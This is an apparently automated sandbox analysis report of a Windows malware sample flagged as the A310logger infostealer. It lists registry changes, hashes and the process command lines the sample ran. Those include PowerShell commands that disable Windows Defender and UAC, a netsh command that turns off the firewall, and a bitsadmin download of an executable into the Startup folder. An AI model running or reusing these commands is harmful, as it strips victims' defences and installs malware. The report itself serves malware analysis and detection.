Analysis Overview
SHA256
525c7562d9f07b07e1bf4a92543ab81576abc61c2ea074f82426b5f0f54df2ec
Threat Level: Known bad
The file 525c7562.exe was found to be: Known bad.
Malicious Activity Summary
A310logger
UAC bypass
A310logger Executable
UPX packed file
Executes dropped EXE
Downloads MZ/PE file
Modifies Windows Firewall
Checks computer location settings
Drops startup file
Reads user/profile data of web browsers
Loads dropped DLL
Adds Run key to start application
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Drops file in Windows directory
Enumerates physical storage devices
Office loads VBA resources, possible macro or embedded object present
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
Download via BitsAdmin
Suspicious use of WriteProcessMemory
Suspicious behavior: AddClipboardFormatListener
Enumerates system info in registry
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Modifies registry class
Checks processor information in registry
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-03-28 18:12
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-03-28 18:12
Reported
2022-03-28 18:16
Platform
win7-20220311-en
Max time kernel
4294178s
Max time network
120s
Command Line
Signatures
UAC bypass
Modifies Windows Firewall
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Enumerates physical storage devices
Office loads VBA resources, possible macro or embedded object present
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\MenuExt | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\525c7562.exe
"C:\Users\Admin\AppData\Local\Temp\525c7562.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\document.vbs"
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\RarSFX0\document.docx"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\RarSFX0\first.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionExtension ".exe""
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -PUAProtection disable"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -MAPSReporting 0"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "netsh advfirewall set allprofiles state off"
C:\Windows\SysWOW64\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer Packages /download /priority foreground https://github.com/tyler617/first/releases/download/v1.0/first.exe "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\first.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.3:443 | github.com | tcp |
| DE | 140.82.121.3:443 | github.com | tcp |
Files
memory/1608-54-0x0000000075DF1000-0x0000000075DF3000-memory.dmp
memory/768-55-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\document.vbs
| MD5 | bbb665124c29492698fa1d4b0c9f7d63 |
| SHA1 | 91f4d90d308fd5e25c56b797f1ee10528f2b7fc9 |
| SHA256 | 4f7b3391cb4b4ca0e55080c4e92538b680a63b39fee77fe9543b37e6a3f6edb3 |
| SHA512 | 51c10ee54cb1c64c3cf5d6e3b30e2d7e926a6de4c634af96fcfa8c5c910988db48f61f1d3c5597251bdbab56702dd1dcd26357a551c2501272072b3beb8f0ae7 |
memory/620-58-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\first.bat
| MD5 | 08c4e453896495e3133c35ffc0fc8f77 |
| SHA1 | 5a544aed791b58787b94573224b12e34db1bd26a |
| SHA256 | 7b1d1e640826175729db746d7c6bcbc0f25d524a3b859107a3e3d2b08d28e458 |
| SHA512 | 2b79fdea82bb87bcd6c1e2b88480c8ebdcb76e59ea70ecff02d14ec0079eedeb7e918102d63e343de64fb13032a85e821e9b24d969c46a05f0f27975bc469e41 |
memory/1916-60-0x0000000000000000-mapping.dmp
memory/620-61-0x00000000719D1000-0x00000000719D4000-memory.dmp
memory/1612-62-0x0000000000000000-mapping.dmp
memory/620-64-0x000000006F451000-0x000000006F453000-memory.dmp
memory/620-65-0x000000005FFF0000-0x0000000060000000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\document.docx
| MD5 | e4552a689008c6fcd6cd00f3d5a5a93e |
| SHA1 | f9772e236c17c5aca5a0f7889499833d92c9f899 |
| SHA256 | a1078fb7a3acf9bbdba7a623c46c99a3b2df4687800949feafff3868d6f92bec |
| SHA512 | aaa0410cf06914de1f185d328cab0e65b2688fda84f25e1d383b81c7ac53908056edfd4ad1425897c01049e7976611ceb7140df7f5fcc25c8ecdaf8869920c67 |
memory/1612-69-0x0000000002070000-0x00000000020B0000-memory.dmp
memory/620-70-0x000000007043D000-0x0000000070448000-memory.dmp
